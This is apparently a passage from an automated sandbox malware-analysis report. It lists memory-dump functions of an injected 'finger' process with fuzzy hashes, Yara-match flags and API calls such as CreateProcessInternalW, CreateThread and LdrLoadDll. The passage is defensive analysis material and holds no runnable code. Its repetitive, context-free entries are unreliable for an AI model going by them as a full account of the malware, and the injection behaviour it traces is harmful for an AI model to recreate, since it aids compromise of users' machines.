                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 208fed9fe70b537c976e4c65e2834b74603a43ee5205813a0a1d26a90d53e2b7
                                                                                              • Instruction ID: eabda0a3a17a4cc5e64c7874520055868a19f7565f6855576cf73e1922d8477a
                                                                                              • Opcode Fuzzy Hash: 208fed9fe70b537c976e4c65e2834b74603a43ee5205813a0a1d26a90d53e2b7
                                                                                              • Instruction Fuzzy Hash: 809002A174280842E100B1DC9414B060445C7F1301F55C015E1064554D8719CD526126
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: df20b500a9d0264a0694a18848c06c221b3ba25350d8b3634398d1f0baeb8ab2
                                                                                              • Instruction ID: 0030ac85f373a10f230c0abb551a785d2ad59c9fe69b7c7256ec21b088741b2f
                                                                                              • Opcode Fuzzy Hash: df20b500a9d0264a0694a18848c06c221b3ba25350d8b3634398d1f0baeb8ab2
                                                                                              • Instruction Fuzzy Hash: 7F900261B02804425140B1ECD8449064445ABF1211755C121A0998550D865989655665
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: ca2cbd94176a8985892efdfe57278fa4219a8274ca10e4800bb3471f94b391ac
                                                                                              • Instruction ID: ebad0d73a34809a8e53cdbb00ba94a4353df6577dc89e226785fdbef313c2a05
                                                                                              • Opcode Fuzzy Hash: ca2cbd94176a8985892efdfe57278fa4219a8274ca10e4800bb3471f94b391ac
                                                                                              • Instruction Fuzzy Hash: 5C900261712C0442E200B5EC9C14B07044587E0303F55C115A0154554CCA1589615521
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f2013ff0630e7100ac6aec60bacbe6cbb877f58a6f1372033a7c32a424bdc4d1
                                                                                              • Instruction ID: 765a5f4abad16818fb27d4f375108811416d6dc36079a2a574d1f76b69f0c4ea
                                                                                              • Opcode Fuzzy Hash: f2013ff0630e7100ac6aec60bacbe6cbb877f58a6f1372033a7c32a424bdc4d1
                                                                                              • Instruction Fuzzy Hash: E8900261B0280902E101B1DC9404616044A87E0241F95C022A1024555ECB258A92A131
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: c9f2556801bfb37bbc79590a64d31f59fad71ede16c8665d498ab497bd0e22b4
                                                                                              • Instruction ID: 9e78f80f858fb3a748b40bc4721e098f2b1235491e5f39946faf0fafb022cfd2
                                                                                              • Opcode Fuzzy Hash: c9f2556801bfb37bbc79590a64d31f59fad71ede16c8665d498ab497bd0e22b4
                                                                                              • Instruction Fuzzy Hash: D09002A1702C0803E140B5DC9804607044587E0302F55C011A2064555E8B298D516135
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 890f3960cf126588216944cb3878092931507f4f1a5fe9eb9eab2d78cf10d0b6
                                                                                              • Instruction ID: 84f161529564ff01577915f0755942248f3f274dbd8fa7a2924a3bda0b66804d
                                                                                              • Opcode Fuzzy Hash: 890f3960cf126588216944cb3878092931507f4f1a5fe9eb9eab2d78cf10d0b6
                                                                                              • Instruction Fuzzy Hash: 2090026971380402E180B1DCA40860A044587E1202F95D415A0015558CCA1589695321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f80d497db28b74d7f86a7f84a3b5b7a11d10be3e0f523b04935d9fd330fa834c
                                                                                              • Instruction ID: ef3dfbe931edf5a2c55f4da43b569f33f4ba8e58d498295d9491ec8ba08ab6c2
                                                                                              • Opcode Fuzzy Hash: f80d497db28b74d7f86a7f84a3b5b7a11d10be3e0f523b04935d9fd330fa834c
                                                                                              • Instruction Fuzzy Hash: A490026170280403E140B1DCA4186064445D7F1301F55D011E0414554CDA1589565222
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: a5e470e6fe859458566f7659fa5179eaab2668b562e3a2124ff735d5da1b8e75
                                                                                              • Instruction ID: 5aeaacb22e8e0644ebead491f1955a90625cc573b66eecf6cc2ceab0c370a44b
                                                                                              • Opcode Fuzzy Hash: a5e470e6fe859458566f7659fa5179eaab2668b562e3a2124ff735d5da1b8e75
                                                                                              • Instruction Fuzzy Hash: 9A900261743845526545F1DC9404507444697F0241795C012A1414950C86269956D621
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 2818c24d186168eb06f922f8048b11f332e1b49866f53eee6118344d471f0b31
                                                                                              • Instruction ID: 7a3736e5fe267c2cf53097445167e01d99a8f4116be404d4027009868a4d34e4
                                                                                              • Opcode Fuzzy Hash: 2818c24d186168eb06f922f8048b11f332e1b49866f53eee6118344d471f0b31
                                                                                              • Instruction Fuzzy Hash: 9890027170280813E111B1DC9504707044987E0241F95C412A0424558D97568A52A121
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: d9821243f2bcf7a32e493de189da691a367ceaa77226b4f2bcd8e0eda67d548d
                                                                                              • Instruction ID: 50eec82a118d61bae563cff32cefb99f6176c8071bad8d311a6af2f7c31e3b6c
                                                                                              • Opcode Fuzzy Hash: d9821243f2bcf7a32e493de189da691a367ceaa77226b4f2bcd8e0eda67d548d
                                                                                              • Instruction Fuzzy Hash: DF90027170280C42E100B1DC9404B46044587F0301F55C016A0124654D8715C9517521
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: bc0f2bd64417e52702d1b0f8dd37cc0ab5f196aa58fc1c6671b4b7f0997cd9af
                                                                                              • Instruction ID: 9a5816b7c678b3034c470dba0753e2f0a46bb48daf06bc209f3eeb31dc14dd23
                                                                                              • Opcode Fuzzy Hash: bc0f2bd64417e52702d1b0f8dd37cc0ab5f196aa58fc1c6671b4b7f0997cd9af
                                                                                              • Instruction Fuzzy Hash: 6090027170288C02E110B1DCD40474A044587E0301F59C411A4424658D879589917121
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: a0926e44e6e3f4f3e5031c20fac1ca67482fc602e1020517ef780fb9b51f0ea3
                                                                                              • Instruction ID: 265e569b1773dc63d71095544e6c140b62899a2c3bc4c00dba03998acfb90b71
                                                                                              • Opcode Fuzzy Hash: a0926e44e6e3f4f3e5031c20fac1ca67482fc602e1020517ef780fb9b51f0ea3
                                                                                              • Instruction Fuzzy Hash: 1C90027170280802E100B5DCA408646044587F0301F55D011A5024555EC76589916131
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 5a85138660e37d53e532ad1a9b02cc808d2199b75fe3813e6ba0aad2573319f3
                                                                                              • Instruction ID: 6ad42aa000f2681dfa977bb9d7ba1e4d17d711317d9ebf10dbb325cf126be43f
                                                                                              • Opcode Fuzzy Hash: 5a85138660e37d53e532ad1a9b02cc808d2199b75fe3813e6ba0aad2573319f3
                                                                                              • Instruction Fuzzy Hash: 17900271B0690802E100B1DC9514706144587E0201F65C411A0424568D87958A5165A2
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 60c6f9eed8087329f1fce075c7077176b926141769162f8251ad42c64ec6d8c0
                                                                                              • Instruction ID: 936dae6fb24fe1fcc8ca9ba6363eb2bbb6900730203969cbff89b6303f5911db
                                                                                              • Opcode Fuzzy Hash: 60c6f9eed8087329f1fce075c7077176b926141769162f8251ad42c64ec6d8c0
                                                                                              • Instruction Fuzzy Hash: A690026174685502E150B1DC94046164445A7F0201F55C021A0814594D865589556221

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02880FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                                                              • Instruction ID: 80946892962672d74ccc0aed76df9e49341f8b3413a6f5d02d2f4c784d3c6bbd
                                                                                              • Opcode Fuzzy Hash: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                                                              • Instruction Fuzzy Hash: FF01893AE00248B6EF10A694AC41FEEB76C8F41B50F048155FA08FB280DA7559038BD6

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 518 2880f69-2880f80 520 2880f89-2880fde call 289c170 call 2884700 call 28713e0 call 2891e40 518->520 521 2880f84 call 289b760 518->521 530 2881000-2881005 520->530 531 2880fe0-2880ff1 PostThreadMessageW 520->531 521->520 531->530 532 2880ff3-2880ffd 531->532 532->530
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02880FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                                                              • Instruction ID: 59e7426519021ef7f0cde4b8b6621e464e6b98d477ecad1067a5ec9ad04a3241
                                                                                              • Opcode Fuzzy Hash: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                                                              • Instruction Fuzzy Hash: 6A11DB39E40358B6EF21A6948C45FDF7B7C9F41B94F148055FA08FB2C0D6B46A068BE6

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 533 2880f70-2880f80 534 2880f89-2880fde call 289c170 call 2884700 call 28713e0 call 2891e40 533->534 535 2880f84 call 289b760 533->535 544 2881000-2881005 534->544 545 2880fe0-2880ff1 PostThreadMessageW 534->545 535->534 545->544 546 2880ff3-2880ffd 545->546 546->544
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02880FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                                                              • Instruction ID: f0c9e155fd54571b7ab74f0156f522ce53375085daf9e4a50ecbbf5df4c92ab3
                                                                                              • Opcode Fuzzy Hash: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                                                              • Instruction Fuzzy Hash: B601D63AD40358B6EF21A6948C41FDFBB7C9F41B94F148055FA08BB280D6B466068BE6
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02893D4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: net.dll$wininet.dll
                                                                                              • API String ID: 3472027048-1269752229
                                                                                              • Opcode ID: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                                                              • Instruction ID: 30e3f9d298b2e9045613aef07ee60683e1a7d4b2e29632db202999c6716c057c
                                                                                              • Opcode Fuzzy Hash: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                                                              • Instruction Fuzzy Hash: 893150B9A01305BBDB14DF68D880FEAB7B9FB84714F04815CF659AB244D774BA00CBA5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              • Opcode ID: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                                                              • Instruction ID: f219621401fd03d9b582b1bf43f2f070846bcb08eb7e97cdf9992979d20c83a6
                                                                                              • Opcode Fuzzy Hash: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                                                              • Instruction Fuzzy Hash: 4C3132B9A0060A9FDF10EFD8D8809EEB7B9FF88304B108559E615E7214D775EE45CBA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              • Opcode ID: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                                                              • Instruction ID: b1506c9d27848086a23f9ed53211db8db5ba442f3b0a12719d2adb6332e10ad1
                                                                                              • Opcode Fuzzy Hash: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                                                              • Instruction Fuzzy Hash: C23133B9A0060A9FDB00EFD8D8809EFB7B9FF88304B508559E615E7214D775EE05CBA0
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02884772
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID: &cE}
                                                                                              • API String ID: 2234796835-1295445062
                                                                                              • Opcode ID: a2d3d48aabd28925619e736efd6220602dd56ff2303de9b8373dd2c8badc9a7f
                                                                                              • Instruction ID: 8e33b3fda170057921ae6355e944ae1370f105225ef3bfa7c7c089e38446dd8c
                                                                                              • Opcode Fuzzy Hash: a2d3d48aabd28925619e736efd6220602dd56ff2303de9b8373dd2c8badc9a7f
                                                                                              • Instruction Fuzzy Hash: ED31A67FB4428AABDB15EF78CC42BAA77A8EB41744F4801DCE809CB046E7309514CB91
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02884772
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                              • Instruction ID: fb3dfa36f0754cecc0d6f5cd635d1bd748fbd7dc722c491860e728f82b903cd1
                                                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                              • Instruction Fuzzy Hash: 76011EBED4020EABDF10EBE4DC41FADB3B99B44708F5441A5A90DD7280F631E7148B92
                                                                                              APIs
                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,028884CE,00000010,?,?,?,00000044,?,00000010,028884CE,?,00000000,?), ref: 02899A60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInternalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2186235152-0
                                                                                              • Opcode ID: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                              • Instruction ID: 03d52f1b8a51b3c2da7bf3397a162e934b266501e0500e2de3f2c49e43e9cb16
                                                                                              • Opcode Fuzzy Hash: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                              • Instruction Fuzzy Hash: 500180B6215108BBDB48DE99DC85EDB77AEAF8C754F448218BA0DE3240D630F9518BA4
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02879F05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                              • Instruction ID: 150b541b3b6f32638164a1ab9d951a1038e5b8ad7b0d0e128cef8a850cdeca4a
                                                                                              • Opcode Fuzzy Hash: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                              • Instruction Fuzzy Hash: A8F0653B38030436E62065AD9C02FDB765DCB84765F180025F70CDA1C0E5A6B40146E5
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02879F05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                              • Instruction ID: ee686121854e960578ee8a8b6139b726e50ce4f02c62bbcf13c2093bf7cb450a
                                                                                              • Opcode Fuzzy Hash: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                              • Instruction Fuzzy Hash: 54F0657A24030036E631669A8C06FDB765DCFC5B50F140019F70CDA1C0D9A6B40086F5
                                                                                              APIs
